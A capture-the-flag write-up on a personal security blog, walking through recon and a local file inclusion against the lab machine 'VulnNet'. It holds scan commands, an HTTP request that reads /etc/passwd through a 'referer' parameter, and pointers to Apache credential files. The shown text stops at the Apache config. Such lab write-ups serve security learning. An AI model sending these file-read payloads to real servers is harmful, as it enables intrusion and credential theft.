<!DOCTYPE html>













<html lang="en"
  
    data-mode="dark"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Allow having a localized datetime different from the appearance language -->
  

  

    

    

  

  <!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="VulnNet" />
<meta property="og:locale" content="en" />
<meta name="description" content="[0x01] Outline" />
<meta property="og:description" content="[0x01] Outline" />
<link rel="canonical" href="https://glenntoms.github.io/posts/vulnnet/" />
<meta property="og:url" content="https://glenntoms.github.io/posts/vulnnet/" />
<meta property="og:site_name" content="InfoSec Journey" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-02-28T06:07:11+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="VulnNet" />
<meta name="twitter:site" content="@Glenn__Toms" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"https://glenntoms.github.io/posts/vulnnet/"},"@type":"BlogPosting","description":"[0x01] Outline","url":"https://glenntoms.github.io/posts/vulnnet/","headline":"VulnNet","dateModified":"2022-03-02T09:16:31+00:00","datePublished":"2022-02-28T06:07:11+00:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <title>VulnNet | InfoSec Journey
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="InfoSec Journey">
<meta name="application-name" content="InfoSec Journey">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  

    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

</head>


  

  <body data-spy="scroll" data-target="#toc" data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto">
        
          
          <img src="
            
              /assets/about/me.jpg
            
          " alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/">InfoSec Journey</a>
    </div>
    <div class="site-subtitle font-italic">An InfoSec Journey there and back again</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    

    
      

      
      <a href="https://github.com/GlennToms" aria-label="github"
        target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/Glenn__Toms" aria-label="twitter"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['infosec','toms.gg'].join('@')" aria-label="email"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>VulnNet</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        









<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Add attribute 'hide-bullet' to the checkbox list -->



<!-- images -->




  
  

  
    
      
      
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  

  



<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  

  
  

  




<!-- Wrap prompt element of blockquote with the <div> tag -->







  
  

  

    
      
      

    

    
    

    
    
    

    
      
        
        

    

    
    

    

  

    

    
    

    
    
    

    
      
        
        

    

    
    

    

  

    

    
    

    
    
    

    
      
        
        

    

    
    

    

  

    

    
    

    
    
    

    
      
        
        

    

    
    

    

  

  



<!-- return -->







<h1 data-toc-skip>VulnNet</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>
    
    

    

    By
    <em>
      
        <a href="https://twitter.com/glenn__toms">Glenn Toms</a>
      
    </em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->

<em class="timeago"
    data-ts="1646028431"
    
      data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll"
    
    >
  2022-02-28
</em>

      </span>

      <!-- lastmod date -->
      
      <span>
        Updated
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->

<em class="timeago"
    data-ts="1646212591"
    
      data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll"
    
    >
  2022-03-02
</em>

      </span>
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="2184 words">
  <em>12 min</em> read</span>


      <!-- page views -->
      
    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <h2 id="0x01-outline"><span class="mr-2">[0x01] Outline</span><a href="#0x01-outline" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p><img data-src="/assets/img/vulnnet/vulnnet_icon.png" alt="Subscribe" width="100" class="left" data-proofer-ignore></p>

<p>VulnNet has a Medium difficulty rating running <code class="language-plaintext highlighter-rouge">PHP</code> as its web language. The brief states that it takes a more realistic approach to infiltrating the system.</p>

<p>Our first step is to enumerate the subdomains and collect a username and password using <code class="language-plaintext highlighter-rouge">LFI</code>.
Then, using an unauthenticated file upload vulnerability, we upload our reverse shell, and finally, all privilege escalation is accomplished through the use of a backup script and <code class="language-plaintext highlighter-rouge">tar</code> abuse.</p>

<h2 id="0x02-recon"><span class="mr-2">[0x02] Recon</span><a href="#0x02-recon" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>Our scope document says we should add <code class="language-plaintext highlighter-rouge">vulnnet.thm</code> to our hosts file.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">sudo echo</span> <span class="s1">'10.10.94.236 vulnnet.thm'</span> <span class="o">&gt;&gt;</span> /etc/hosts
</pre></td></tr></tbody></table></code></div></div>

<p>Running nmap we find 2 ports open. Banners are reporting <code class="language-plaintext highlighter-rouge">Ubuntu</code> and an Apache web server.</p>

<h3 id="nmap"><span class="mr-2">nmap</span><a href="#nmap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oA</span> nmap/vulnnet <span class="nt">-v</span> <span class="nt">-p-</span> <span class="nt">-Pn</span> vulnnet.thm

<span class="c"># Nmap 7.92 scan initiated Mon Feb 28 09:48:27 2022 as: nmap -sC -sV -oA nmap/vulnnet -v -p- -Pn vulnnet.thm</span>
Nmap scan report <span class="k">for </span>vulnnet.thm <span class="o">(</span>10.10.94.236<span class="o">)</span>
Host is up <span class="o">(</span>0.066s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c <span class="o">(</span>RSA<span class="o">)</span>
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-title: VulnNet
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
<span class="nt">---</span> snip <span class="nt">---</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Knowing that we have a web server, the next thing we’ll do is run two <code class="language-plaintext highlighter-rouge">gobuster</code> scans one to find additional subdomains and the other to enumerate content.</p>
<blockquote class="prompt-tip"><div>
  <p>It’s always good practice to have automatic <code class="language-plaintext highlighter-rouge">Recon</code> going while you’re working. It will save you a lot of time when you need other avenues to explore.</p>
</div></blockquote>

<h3 id="gobuster"><span class="mr-2">gobuster</span><a href="#gobuster" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>gobuster vhost <span class="nt">-u</span> http://vulnnet.thm <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt <span class="nt">-o</span> vulnnet-vhost.gobuster
</pre></td></tr></tbody></table></code></div></div>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://vulnnet.thm <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt <span class="nt">-o</span> vulnnet-dir.gobuster
</pre></td></tr></tbody></table></code></div></div>

<h3 id="walking-the-website"><span class="mr-2">Walking the website</span><a href="#walking-the-website" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>While our <code class="language-plaintext highlighter-rouge">gobuster</code> is scanning we can take a look at the website.  The first page has a subscribe form, checking the developer tools in Firefox we can see that there is no <code class="language-plaintext highlighter-rouge">POST</code> request and the button takes you back to the main page.</p>

<p><img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 700 400'%3E%3C/svg%3E" data-src="/assets/img/vulnnet/01.png" alt="Subscribe" width="700" height="400" data-proofer-ignore></p>

<p>Watching the network tab on the dev tools we can see that there are two <code class="language-plaintext highlighter-rouge">js</code> files being loaded, <code class="language-plaintext highlighter-rouge">index__7ed54732.js</code> and <code class="language-plaintext highlighter-rouge">index__d8338055.js</code>, we’ll take note of these and continue walking the site.</p>

<p>Clicking the sign-in button takes you to a login form.  Brute forcing isn’t an option as we have no usernames or passwords to try.  <code class="language-plaintext highlighter-rouge">Sign Up</code> and <code class="language-plaintext highlighter-rouge">Forgot Password</code> are just Anchor Tags and don’t go anywhere.</p>

<p><img data-src="/assets/img/vulnnet/02.png" alt="Sigin" width="300" data-proofer-ignore></p>

<p>After spending a few minutes with <code class="language-plaintext highlighter-rouge">BurpSuite</code> trying various <code class="language-plaintext highlighter-rouge">SQLI</code> attacks we’re not getting any error messages or indication that <code class="language-plaintext highlighter-rouge">SQLI</code> is possible.  There isn’t anything else to try on the website, so we need to find other endpoints to probe.</p>

<p>Now we move on to the JS files.  We can save them down with <code class="language-plaintext highlighter-rouge">curl -O</code> and run them through a <code class="language-plaintext highlighter-rouge">bash</code> port of <a href="https://twitter.com/TomNomNom">tomnomnom’s</a> go tool <a href="https://github.com/tomnomnom/gf">gf</a> that I coded last week which I called <code class="language-plaintext highlighter-rouge">pursue</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="nb">mkdir </span>src
<span class="nb">cd </span>src
curl <span class="nt">-O</span> http://vulnnet.thm/js/index__7ed54732.js
curl <span class="nt">-O</span> http://vulnnet.thm/js/index__d8338055.js

pursue <span class="nt">--domains</span> | <span class="nb">sort</span> <span class="nt">-u</span>
broadcast.vulnnet.thm
vulnnet.thm
</pre></td></tr></tbody></table></code></div></div>

<p>Searching for domains in these two JS files we find <code class="language-plaintext highlighter-rouge">vulnnet.thm</code> which is the page we are on, and a new subdomain called <code class="language-plaintext highlighter-rouge">broadcast.vulnnet.thm</code>.</p>

<blockquote class="prompt-info"><div>
  <p>gobuster will find this address using ‘subdomains-top1million-5000.txt’</p>
</div></blockquote>

<h3 id="broadcastvulnnetthm"><span class="mr-2">broadcast.vulnnet.thm</span><a href="#broadcastvulnnetthm" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>Adding broadcast.vulnnet.thm address to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> and checking the website we’re prompted for a username and password.</p>

<p>We’ll set <code class="language-plaintext highlighter-rouge">gobuster</code> to scan on <code class="language-plaintext highlighter-rouge">broadcast.vulnnet.thm</code> and check to see if there are any pages that do not require authentication. We’ll have to set <code class="language-plaintext highlighter-rouge">-b 401</code> to ignore <code class="language-plaintext highlighter-rouge">401 Unauthorized</code> status codes.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://broadcast.vulnnet.thm <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt <span class="nt">-o</span> broadcast.dirs <span class="nt">-b</span> 401
</pre></td></tr></tbody></table></code></div></div>

<p>Now we’re stuck since we’ve exhausted <code class="language-plaintext highlighter-rouge">vulnnet.thm</code>. Our directory scan didn’t find anything, and we’re waiting on our <code class="language-plaintext highlighter-rouge">gobuster</code> scan of <code class="language-plaintext highlighter-rouge">broadcast.vulnnet.thm</code>. We can go back and take a deeper look at the JS files.</p>

<h2 id="0x03-local-file-inclusion"><span class="mr-2">[0x03] Local File Inclusion</span><a href="#0x03-local-file-inclusion" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>Running <code class="language-plaintext highlighter-rouge">pursue</code> on our JS files shows that <code class="language-plaintext highlighter-rouge">index__d8338055.js</code> has a call with a <code class="language-plaintext highlighter-rouge">referer</code> parameter.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>pursue <span class="nt">--query</span>
./index__d8338055.js:http://vulnnet.thm/index.php?referer<span class="o">=</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The code is heavily compacted, I honestly have no idea how to read it, but clearly it must be calling <code class="language-plaintext highlighter-rouge">http://vulnnet.thm/index.php</code> and setting <code class="language-plaintext highlighter-rouge">referer=</code> to something. Let’s take a closer look in <code class="language-plaintext highlighter-rouge">BurpSuite</code>.</p>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="o">---</span><span class="nx">snip</span><span class="o">---</span>
<span class="p">,</span> <span class="nx">n</span><span class="p">.</span><span class="nx">n</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span><span class="kd">var</span> <span class="nx">t</span> <span class="o">=</span> <span class="nx">e</span> <span class="o">&amp;&amp;</span> <span class="nx">e</span><span class="p">.</span><span class="nx">__esModule</span> <span class="p">?</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">e</span><span class="p">.</span><span class="k">default</span> <span class="p">}</span> <span class="p">:</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">e</span> <span class="p">};</span> <span class="k">return</span> <span class="nx">n</span><span class="p">.</span><span class="nx">d</span><span class="p">(</span><span class="nx">t</span><span class="p">,</span> <span class="dl">"</span><span class="s2">a</span><span class="dl">"</span><span class="p">,</span> <span class="nx">t</span><span class="p">),</span> <span class="nx">t</span><span class="p">},</span> <span class="nx">n</span><span class="p">.</span><span class="nx">o</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">t</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">Object</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">hasOwnProperty</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">t</span><span class="p">)</span> <span class="p">},</span> 
        <span class="nx">n</span><span class="p">.</span><span class="nx">p</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">http://vulnnet.thm/index.php?referer=</span><span class="dl">"</span><span class="p">,</span> <span class="nx">n</span><span class="p">(</span><span class="nx">n</span><span class="p">.</span><span class="nx">s</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)}({</span>
<span class="o">---</span><span class="nx">snip</span><span class="o">---</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="referer"><span class="mr-2">referer=</span><a href="#referer" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>When clicking on the subscribe button we can see that there is a new Header <code class="language-plaintext highlighter-rouge">Referer: http://vulnnet.thm/?</code>. So this JS file and function is setting <code class="language-plaintext highlighter-rouge">referer</code> to the current page we are currently on.</p>

<blockquote class="prompt-tip"><div>
  <p>When you see query parameters in URLs, try LFI Local File Inclusion.</p>
</div></blockquote>

<p>Loading the page and sending the request to the <code class="language-plaintext highlighter-rouge">repeater</code> tab of Burp allows us to try many types of paths for our <code class="language-plaintext highlighter-rouge">LFI</code>.</p>

<div class="language-yaml highlighter-rouge"><div class="code-header">
        <span data-label-text="YAML"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="s">GET /index.php?referer=/etc/passwd HTTP/1.1</span>
<span class="na">Host</span><span class="pi">:</span> <span class="s">vulnnet.thm</span>
<span class="na">User-Agent</span><span class="pi">:</span> <span class="s">Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0</span>
<span class="na">Accept</span><span class="pi">:</span> <span class="s">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span>
<span class="na">Accept-Language</span><span class="pi">:</span> <span class="s">en-US,en;q=0.5</span>
<span class="na">Accept-Encoding</span><span class="pi">:</span> <span class="s">gzip, deflate</span>
<span class="na">DNT</span><span class="pi">:</span> <span class="m">1</span>
<span class="na">Connection</span><span class="pi">:</span> <span class="s">close</span>
<span class="na">Upgrade-Insecure-Requests</span><span class="pi">:</span> <span class="m">1</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Trying <code class="language-plaintext highlighter-rouge">/etc/passwd</code> and searching the response for <code class="language-plaintext highlighter-rouge">root:</code> we get one match, meaning we read out the contents of <code class="language-plaintext highlighter-rouge">/etc/passwd</code> and we now have a list of all the users on this system.</p>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>root:x:0:0:root:/root:/bin/bash
---snip---
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
mysql:x:112:123:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
</pre></td></tr></tbody></table></code></div></div>

<h3 id="apache-config"><span class="mr-2">Apache config</span><a href="#apache-config" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>Now we can read out files that belong to the web server we should be able to find the Apache config files.
From our nmap banners we know this system is running <code class="language-plaintext highlighter-rouge">Apache httpd 2.4.29</code> on <code class="language-plaintext highlighter-rouge">Ubuntu</code>.  Searching the web for this information we’ll find that the default config location is <code class="language-plaintext highlighter-rouge">/etc/apache2/apache2.conf</code> and <code class="language-plaintext highlighter-rouge">/etc/apache2/sites-available/000-default.conf</code></p>

<p>Checking <code class="language-plaintext highlighter-rouge">/etc/apache2/sites-available/000-default.conf</code> and finding the section for <code class="language-plaintext highlighter-rouge">broadcast.vulnnet.thm</code> we can see the path for <code class="language-plaintext highlighter-rouge">AuthUserFile</code> is <code class="language-plaintext highlighter-rouge">/etc/apache2/.htpasswd</code>.  This file should have a username and password.</p>

<div class="language-conf highlighter-rouge"><div class="code-header">
        <span data-label-text="Conf"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td><td class="rouge-code"><pre>---<span class="n">snip</span>---
&lt;<span class="n">VirtualHost</span> *:<span class="m">80</span>&gt;
	<span class="n">ServerAdmin</span> <span class="n">webmaster</span>@<span class="n">localhost</span>
	<span class="n">ServerName</span> <span class="n">broadcast</span>.<span class="n">vulnnet</span>.<span class="n">thm</span>
